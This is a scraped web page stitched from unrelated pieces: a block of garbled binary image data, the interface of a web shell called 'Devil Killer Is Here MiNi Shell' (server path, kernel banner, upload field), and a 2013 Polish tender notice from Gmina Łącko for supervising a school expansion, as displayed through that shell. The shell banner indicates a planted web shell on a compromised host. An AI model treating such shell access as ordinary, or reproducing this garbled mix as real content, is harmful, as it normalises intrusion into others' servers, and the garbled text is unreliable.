JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130902/353046-N-2013.html

<p class="kh_header"><b>Łącko: Pełnienie nadzoru inwestorskiego nad  robotami  związanymi  z  realizacją   zadania  p.n.: Rozbudowa  Zespołu  Szkolno - Gimnazjalnego w Łącku</b><br>
<b>Numer ogłoszenia: 353046 - 2013; data zamieszczenia: 02.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łącko , Łącko 445, 33-390 Łącko, woj. małopolskie, tel. 18 41 40 710, faks 18 41 40 740.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lacko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad  robotami  związanymi  z  realizacją   zadania  p.n.: Rozbudowa  Zespołu  Szkolno - Gimnazjalnego w Łącku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie  nadzoru inwestorskiego  następujących   robót  budowlanych i czynności :  

Zadanie nr 1: Branża  konstrukcyjno - budowlana 
ETAP  I:
- rozbiórka  istniejącego  budynku  szkolnego i gospodarczego,  
- wykonanie robót ziemnych,
- wykonanie fundamentów, elementów nadziemia (  kl. schodowe i pozostałe)
- wykonanie   elementów żelbetowych,
- wykonanie dachu - konstrukcja i pokrycie
- wykonanie robót murowych,
- wykonanie obróbek blacharskich i orynnowania,
- wykonanie stolarki okiennej i drzwiowej,
-  wykonanie tynków  i okładzin
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 2 egzemplarzach w skali 1:1000  z naniesionymi numerami działek, 
ETAP II:
- pomieszczenia kotłowni;
- posadzki;
- roboty malarskie;
- elementy ślusarskie;
- roboty wewnętrzne
- elewacja;
-  winda osobowa
- zadaszenie - daszki;
- pochylnia dla niepełnosprawnych, schody główne i zewnętrzne;
- opaska przy budynku;
- chodniki;
- zagospodarowanie terenu;
- ogrodzenie
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 3 egzemplarzach w skali 1:1000 oraz w skali 1 : 500  z naniesionymi numerami działek, 
-  w imieniu Zamawiającego uzyskania w PINB decyzji o pozwoleniu na użytkowanie 

Zadanie nr 2: Branża  instalacyjna  w  zakresie sieci, instalacji i urządzeń c.o.,sanitarnych wodociągowych  i kanalizacyjnych
ETAP  I:
- przełożenie  przyłacza wodociągowego,  przyłącz  wodociągowy, przyłącz kanalizacji sanitarnej, przyłącz kanalizacji  deszczowej,
- wykonanie  instalacji wod - kan., p. poż.
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 2 egzemplarzach w skali 1:1000  z naniesionymi numerami działek, 

ETAP II:
- przełożenie przyłącza  wodociągowego, przyłącz wodociągowy, przyłącz kanalizacji sanitarnej, przyłącz kanalizacji deszczowej;
- instalacja wod - kan., p.poż;
- wentylacja mechaniczna;
- instalacja centralnego ogrzewania;
- kotłownia olejowa;
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 3 egzemplarzach w skali 1:1000 oraz w skali 1 : 500  z naniesionymi numerami działek, 
-  w imieniu Zamawiającego uzyskania w PINB decyzji o pozwoleniu na użytkowanie 

Zadanie nr 3: Branża  instalacyjna  w  zakresie sieci, instalacji i urządzeń elektrycznych,

ETAP  I:
- wykonanie instalacji elektrycznej,
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 2 egzemplarzach w skali 1:1000  z naniesionymi numerami działek, 

ETAP II:
- instalacja elektryczna;
-  wyposażenie w elektryczne urządzenia kuchenne w  zabudowie wyspowej;
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 3 egzemplarzach w skali 1:1000 oraz w skali 1 : 500   z naniesionymi numerami działek, 
-  w imieniu Zamawiającego uzyskania w PINB decyzji o pozwoleniu na użytkowanie 

Szczegółowy opis i zakres robót określają Szczegółowe Specyfikacje Techniczne (SST), przedmiar robót   dokumentacja projektowa dostępne  są na stronie  www.lacko.pl  przetargi w BIP w postępowaniu dot. robót budowlanych ww. zadania. 
Zamawiający zastrzega sobie prawo odstąpienia od umowy zarówno co do I jak i II etapu  bez skutków prawnych, w tym uiszczenia kar przez Zamawiającego, jeżeli Zamawiający nie uzyska finansowania na realizację I lub II etapu.
Miejsce wykonania zamówienia: Łącko Gmina Łącko.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dla przedmiotu zamówienia analogicznego do określonego w pkt. II. 1.4 i zakresu do 30% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże że   w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie , wykonał co najmniej:  po 1  nadzorze inwestorskim  dla każdej branży w przypadku składania oferty na wszystkie branże, natomiast  w przypadku  ofert częściowych dla  branży na którą składana jest oferta,  którego przedmiotem nadzoru  był obiekt użyteczności publicznej o powierzchni użytkowej minimum 2 000,00 m2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże że   dysponują inspektorem nadzoru posiadającym uprawnienia budowlane bez ograniczeń w specjalności : 
       a) konstrukcyjno - budowlanej,
        b) instalacyjnej w  zakresie sieci, instalacji i urządzeń sanitarnych wodociągowych, kanalizacyjnych i c.o;
        c) instalacyjnej w  zakresie sieci, instalacji , urządzeń elektrycznych ,
lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów,  w przypadku składania oferty na wszystkie branże, natomiast  w przypadku  ofert częściowych dla  branży na którą składana jest oferta.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W wykazie należy wykazać usługi spełniające warunki określone w cz. III.3.2. Do wykazu należy dołączyć dowody dotyczące najważniejszych usług, określające, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy wg wzoru zał. nr 1 do SIWZ; 2. W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków na podstawie art. 26 ust. 2b, oprócz zobowiązania , o którym mowa w art. 26 ust. 2b, Wykonawca zobowiązany jest do przedłożenia oświadczenia i dokumenty określone w cz. III.4.2 w odniesieniu do tych podmiotów; 3. W przypadku wykonawców wspólnie składających ofertę Zamawiający wymaga, aby każdy Wykonawca złożył dokumenty na potwierdzenie, że nie podlega wykluczeniu na podstawie art. 24 ust. 1.; 4. Pełnomocnictwo ( jeśli dotyczy); 5. Jeżeli w miejscu zamieszkania osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania , nie wydaje się dokumentów o których mowa w pkt. 4.3.1. zastępuje się je dokumentem zawierającym oświadczenie w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju , w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem - wystawione odpowiednio w terminie określonym w pkt. 4.3.1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień  umowy może być dokonana w przypadku zmian nieistotnych w stosunku do treści oferty , na podstawie której dokonano wyboru Wykonawcy. Zmiana  umowy  także istotna może być dokonana w przypadku okoliczności, których nie można było przewidzieć w chwili zawarcia    umowy. Zmiana umowy także istotna może  być dokonana w szczególności w przypadku :
a) wydłużenia terminu zakończenia realizacji umowy na wskutek zaistnienia siły wyższej
w stosunku do wykonywanych robót budowlanych (np. wystąpienie nadzwyczajnych warunków pogodowych). O interpretacji siły wyższej i ewentualnym uznaniu przedłużenia terminu wykonania robót budowlanych z tego powodu będzie decydował Zamawiający w trakcie realizacji robót. 
b) wydłużenia terminu realizacji zamówienia spowodowane zmianami: w dokumentacji technicznej, wystąpieniem robót dodatkowych, których wykonanie powoduje przesunięcie terminu wykonania zadania głównego, w uzasadnionych przypadkach, gdy realizacja zadania (robót budowlanych) według dokumentacji technicznej i SST powodowałaby wadliwe
wykonanie przedmiotu umowy,
c) zmniejszenia zakresu przedmiotu umowy z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym,
d) zmiany wyznaczonego przez Wykonawcę inspektora nadzoru inwestorskiego pod warunkiem, że nowy wyznaczony inspektor nadzoru inwestorskiego spełniać będzie wymagania Zamawiającego wskazane w dokumentacji przetargowej,
e) nastąpi konieczność wydłużenia terminu realizacji umowy z powodu wydłużenia terminu zakończenia robót budowlanych, zaakceptowanych przez Zamawiającego - zmiana terminu realizacji o liczbę dni wydłużenia terminu zakończenia robót budowlanych;
f) nastąpi konieczność skrócenia terminu realizacji umowy ze względu na zmniejszenie zakresów rzeczowych zamówienia na roboty budowlane zaakceptowanych przez Zamawiającego;
g)  gdy konieczność zmian do umowy będzie następstwem zmian wprowadzonych w umowie pomiędzy Zamawiającym a Wykonawcą robót budowlanych;
h) zmiana terminu umowy, jeżeli zmiana będą następstwem działania organów sądowych lub administracyjnych,                            w szczególności dotyczących: - przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji decyzji , zezwoleń itp., odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej, konieczności uzyskania wyroku sądowego lub innego orzeczenia sądu lub organu administracyjnego, którego konieczności nie przewidziano przy zawieraniu umowy, itp.
